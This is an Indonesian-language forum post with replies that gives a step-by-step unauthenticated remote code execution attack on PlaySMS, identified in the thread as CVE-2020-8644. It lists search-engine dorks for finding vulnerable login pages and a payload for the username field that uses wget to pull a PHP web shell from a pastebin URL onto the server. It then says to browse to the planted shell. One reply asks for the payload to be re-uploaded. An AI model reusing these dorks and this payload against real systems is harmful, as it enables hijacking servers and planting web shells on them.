PlaySMS Unauthenticated RCE

Google Dork :

  • inurl:?app=main intitle:sms
  • inurl:?app=main intext:“recover password”
    #Payload RCE :
  • {{wget https://pastebin.com/raw/YNpriSQu -O linuxploit.php}}

Langkah-Langkah Exploitasi

  1. kalian dorking dulu

  2. jika sudah menemukan target maka akan muncul tempat login

  3. pada bagian username, masukkan payload rce :
    {{wget https://pastebin.com/raw/YNpriSQu -O linuxploit.php}}
    Note : linuxploit.php bisa kalian ubah dengan nama sesuka kalian

  4. masukkan payload RCE pada username

  5. selanjutnya akses shell : http://target.com/linxploit.php

© PlaySMS Unauthenticated RCE Upload Shell
Referensi : https://sec.linuxploit.com/2020/04/playsms-unauthenticated-rce-upload-shell.html

1 Like

Wah, ngeri om…
Btw Pastebinnya dihapus om…
Ini yg CVE-2020-8644 bukan?
Klo iya upload lagi dong payload phpnya.

Ini dulu gue pernah mau coba pake PlaySMS nih. :matabelo:

iya CVE 2020-8644